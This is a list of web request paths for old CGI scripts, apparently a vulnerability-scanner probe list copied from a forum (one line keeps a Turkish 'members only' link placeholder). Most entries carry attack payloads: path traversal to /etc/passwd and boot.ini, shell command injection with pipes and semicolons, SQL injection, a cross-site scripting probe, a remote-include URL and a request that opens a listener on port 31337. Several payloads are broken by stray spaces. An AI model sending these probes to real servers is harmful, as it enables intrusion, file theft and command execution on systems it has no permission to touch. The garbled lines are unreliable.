/checkout_payment.php?payment_error=cc&error=<scrip t%20language=javascript>window.ale rt
/checklogin.php?cfgProgDir=http://another/interface.php
/chat/data/usr/
/chat/data/
/chat/admin.php3
/chat/admin.php
/chat/!pwds.txt
/chat/!nicks.txt
/cgi-win/uploader.exe
/cgi-win/testcgi.exe?tata=xxxxxuseolstr
/cgi-win/Pbcgi.exe?tata=xxxxuseolstr
/cgi-win/
/cgiWebupdate.exe
/cgi-sys/PGPMail.pl
/cgi-sys/guestbook.cgi?user=cpanel&template=|pwd|
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shl
/cgi-script/CSSearch/CSSearch.cgi
/cgi-script/CSMailto/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/cgi-local/shop.pl/SID=947626980.19094/page=;ls|
/cgi-local/
/cgi-home/
/cgi-dos/foo.cmd?xxx&dir
/cgi-dos/args.bat
/cgi-bin-sdb/
/cgi-bin2/MsmMask.exe?mask=/file.ext
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/cgi-bin/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/cgi-bin/xxxnonexistingyy.pl
/cgi-bin/xxxnonexistingyy.jsp
/cgi-bin/xxxnonexistingyy.exe
/cgi-bin/xxxnonexistingyy.bat
/cgi-bin/wwwthreads/changedisplay.pl
/cgi-bin/www-sql
/cgi-bin/wwwi32.exe/[in=c:\\boot.ini]
/cgi-bin/wwwboard.pl
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwadmin.cgi
/cgi-bin/wsendmail.exe
/cgi-bin/ws_mail.cgi?kill=ng
/cgi-bin/wrap
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com
/cgi-bin/windmail.exe?%20|%20dir%20c:\
/cgi-bin/whois_raw.cgi
/cgi-bin/whois/whois.cgi
/cgi-bin/whois.cgi
/cgi-bin/whois.cgi
/cgi-bin/wguest.exe
/cgi-bin/webwho.pl
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
/cgi-bin/webspirs.cgi?sp.nextform= webspirs.cgi
/cgi-bin/webshell
/cgi-bin/websendmail
/cgi-bin/webplus?script=
/cgi-bin/webplus.exe
/cgi-bin/webnews.cgi
/cgi-bin/webmail?WEBTEMPLATE=a&MAILTEMPLATE=b&EMAIL=a@bb.ne t&SUBJECT=test
/cgi-bin/webmail/login/xxxyyyzzz.authdaemon
/cgi-bin/webgais
/cgi-bin/webdriver
/cgi-bin/webdist.cgi
/cgi-bin/webdata_test.pl
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;l s|&CODE=PHOLD
/cgi-bin/webc.cgi/g/
/cgi-bin/webc.cgi
/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/hosts%00&board=tst
/cgi-bin/webbbs/webbbs_config.pl?followup=|id|&name=100&email= ldf@lasf.net&subject=dd&bO
/cgi-bin/web2mail.cgi
/cgi-bin/Web_Store/web_store.cgi?page=%00
/cgi-bin/web_store.cgi?page=.html|ls|
/cgi-bin/way-board.cgi?db=way-board.cgi%00
/cgi-bin/wais.pl
/cgi-bin/w3-msql/index.html
/cgi-bin/w3mail/login.cgi
/cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
/cgi-bin/virgil.cgi?tar=-lp&zielport=31337
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/cgi-bin/view-source
/cgi-bin/utm/utm_stat?cmd=user_report&sid=q"%20OR%201=1%20OR%20 "q"="q
/cgi-bin/utm/utm_stat?cmd=change_lang&lang=ru",%20bill=10000,%2 0lang="ru&sid=validSID
/cgi-bin/utm/admin?cmd=full_view&sid=q"%20OR%201=1%20OR%20"q"=" q
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
/cgi-bin/Users/default.users
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test99 9%0als
/cgi-bin/useradmin.pl?action=getinfo&htmlfile=|ls+-als|
/cgi-bin/useradmin.pl?action=getinfo&htmlfile=../cgi-bin/useradmin.pl%00.html
/cgi-bin/user_info.php3?user_username=''+or+admin_level=2+o r+username%3d'x'+and+users.id
/cgi-bin/urlcount.cgi
/cgi-bin/uploadn.asp
/cgi-bin/upload_pic.exe
/cgi-bin/upload_pdf.exe
/cgi-bin/upload.exe
/cgi-bin/upload.cgi
/cgi-bin/upload.asp
/cgi-bin/update_profile.cgi
/cgi-bin/update.dpgs
/cgi-bin/unlg1.1
/cgi-bin/uncgi
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/member
/cgi-bin/Ultimate.cgi
/cgi-bin/ttawebtop.cgi/?action=start&pg=
/cgi-bin/tst2.bat
/cgi-bin/tst.bat
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/traceroute.pl
/cgi-bin/traceroute.cgi
/cgi-bin/textcounter.pl
/cgi-bin/texis/vortex.log
/cgi-bin/texis/monitor.log
/cgi-bin/texis/hoschiboschi
/cgi-bin/texis.exe/ngohos
/cgi-bin/testcgi.exe?xssstringo
/cgi-bin/test-cgi
/cgi-bin/test.txt;%20/bin/ls
/cgi-bin/test.pl
/cgi-bin/test.php3
/cgi-bin/test.exe
/cgi-bin/test.cgi
/cgi-bin/test.bat
/cgi-bin/test- cgi.bat
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview
/cgi-bin/sws/manager.pl?
/cgi-bin/survey.cgi
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/story.cgi?next=
/cgi-bin/store/agora.cgi?page=hoschi.html
/cgi-bin/store/__SQLUSER__
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/cgi-bin/statsconfig.pl
/cgi-bin/stats.pl
/cgi-bin/ssi/cgi-bin/ssi
/cgi-bin/ssi//../../../../../../../../../etc/hosts
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/cgi-bin/source.asp
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/smartsearch/smartsearch.cgi?keywords=cmdwithpipes
/cgi-bin/sitenews/sitenews.cgi?edit
/cgi-bin/sitenews.cgi?edit
/cgi-bin/simplestmail.cgi?redirect= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/cgi-bin/simple/config/menu
/cgi-bin/simple
/cgi-bin/showfile
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/shop.pl?page=xxx
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/ShellExample.cgi
/cgi-bin/sgdynamo.exe?HTNAME=default.htm
/cgi-bin/sgb/superguestconfig
/cgi-bin/sgb/superguest.cgi
/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extensi on=pl&config=pl&permissions=7
/cgi-bin/sessions.pl
/cgi-bin/session.pl
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
/cgi-bin/sendpage.pl?message=test";/bin/ls;echo%20"message
/cgi-bin/sendmail.cgi
/cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc
/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/search.pl
/cgi-bin/search.cgi?ul=BOF6000ortmpl=xxx
/cgi-bin/search.cgi?q=query
/cgi-bin/search.cgi%3fletter=
/cgi-bin/search.asp
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/cgi-bin/scripts/cart.pl?vars
/cgi-bin/scripts/cart.pl?env
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/scripts/cart.pl
/cgi-bin/script.bat%3f&dir
/cgi-bin/sbcgi/sitebuilder.cgi
/cgi-bin/sawmill5?rfcf+"/etc/passwd"+spbn+1,1,21,1,1,1,1
/cgi-bin/rwwwshell.pl
/cgi-bin/rwcgi60?test&report=
/cgi-bin/rwcgi60/showenv
/cgi-bin/rwcgi60/
/cgi-bin/rwcgi60.sh?test&report=
/cgi-bin/rwcgi60.exe?test&report=
/cgi-bin/rwcgi60.cgi?test&report=
/cgi-bin/rmp_query
/cgi-bin/rguest.exe
/cgi-bin/responder.cgi
/cgi-bin/readfile.tcl?file=/etc/master.passwd
/cgi-bin/query%3f
/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10
/cgi-bin/psunami.cgi?action=board&board=1&topic=shellcmd
/cgi-bin/processit.pl
/cgi-bin/process_bug.cgi
/cgi-bin/printenv
/cgi-bin/ppdscgi.exe
/cgi-bin/powerup/r.pl?FILE=main.html
/cgi-bin/powerup/r.cgi?FILE=main.html
/cgi-bin/post-query?
/cgi-bin/postings.cgi
/cgi-bin/postie.exe
/cgi-bin/postie.cgi
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/ho
/cgi-bin/postcard.pl
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/plusmail
/cgi-bin/ping.cgi
/cgi-bin/pi?page=********/show_file&id=
/cgi-bin/phpinfo.php3
/cgi-bin/phpinfo.php
/cgi-bin/php.in
/cgi-bin/php.cgi
/cgi-bin/phf
/cgi-bin/PGPMail.pl
/cgi-bin/pfdisplay
/cgi-bin/perl.exe
/cgi-bin/perl
/cgi-bin/pbcgi.cgi?name=tistname&email=
/cgi-bin/passcfg
/cgi-bin/paramtool
/cgi-bin/pals-cgi?palsAction=restart&********Name=pals-cgi
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cgi-bin/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/OrderForm.cgi
/cgi-bin/openwebmail/userstat.pl
/cgi-bin/openwebmail- abook.pl?sessionid=test-session-0
/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0
/cgi-bin/nph-test-cgi
/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&*******=0
/cgi-bin/nph-maillist.pl
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/netpad.cgi?proc=open&of=
/cgi-bin/netauth.cgi?cmd=show&page=../../
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncbook/book.cgi?action=default¤t=|ls|&form_tid=9966 04045&prev= main.html&
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/cgi-bin/msn.cgi
/cgi-bin/MsmSetup.exe?tst
/cgi-bin/MsmFind.exe
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/mojo/mojo.cgi
/cgi-bin/mmstdol.pl
/cgi-bin/mmstdol.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mmstdod.pl
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=& mgaction=&H_ShopID=&H_SID=&H_
/cgi-bin/math_sum.mscgi?a=BOV_87_chars
/cgi-bin/man.sh
/cgi-bin/man.cgi/usr/include;IFS=G;lsG-alsi;|
/cgi-bin/makebook.cgi
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html =
/cgi-bin/mailto?MailTo=swoopme@hotmail.com&text=tst&EmailFo rm=/cgi-bin/mailto
/cgi-bin/mailto.cgi
/cgi-bin/mailsend.exe
/cgi-bin/MailPost.exe
/cgi-bin/mailnews.cgi
/cgi-bin/mailmepro.exe
/cgi-bin/mailme.exe
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/maillist.pl
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&orde r=2&searchkey=&search_fldnum=
/cgi-bin/mailform.pl
/cgi-bin/mailform.exe
/cgi-bin/mailform.cgi
/cgi-bin/mailfile?MailTo=swoopme@hotmail.com&FileName=mailf ile:c&Subject=tst&MailFrom=ts
/cgi-bin/mailfile.cgi?real_name=rc&email=swoopme@hotmail.co m&filename= mailfile.cgi
/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=travers%00
/cgi-bin/mail.cgi
/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom& page=./../../../../../etc/hosts
/cgi-bin/lsindex2.bat
/cgi-bin/lsin.exe
/cgi-bin/logbook/logbook.pl?file=cmdpipe
/cgi-bin/logbook.pl?file=cmdpipe
/cgi-bin/loadpage.cgi
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/cgi-bin/lb5000/search.cgi
/cgi-bin/lastlines.cgi
/cgi-bin/jj
/cgi-bin/ion-p?page=../../../../../etc/hosts
/cgi-bin/ion-p.exe?page=c:\boot.ini
/cgi-bin/input2.bat
/cgi-bin/input.bat
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
/cgi-bin/infosrch.cgi
/cgi-bin/infogate
/cgi-bin/info2www
/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00
/cgi-bin/imapncsa.exe
/cgi-bin/imapcern.exe
/cgi-bin/imagemap.exe
/cgi-bin/imagefolio/admin/admin.cgi?cgi=remove.pl&uid=111.111.111.111&rmstep =2&category=
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
/cgi-bin/ikonboard.cgi
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/ibillpm.pl
/cgi-bin/hwtestio
/cgi-bin/htsearch?exclude=%60%60
/cgi-bin/htsearch.cgi?exclude=%60%60
/cgi-bin/htmlscript
/cgi-bin/html_page?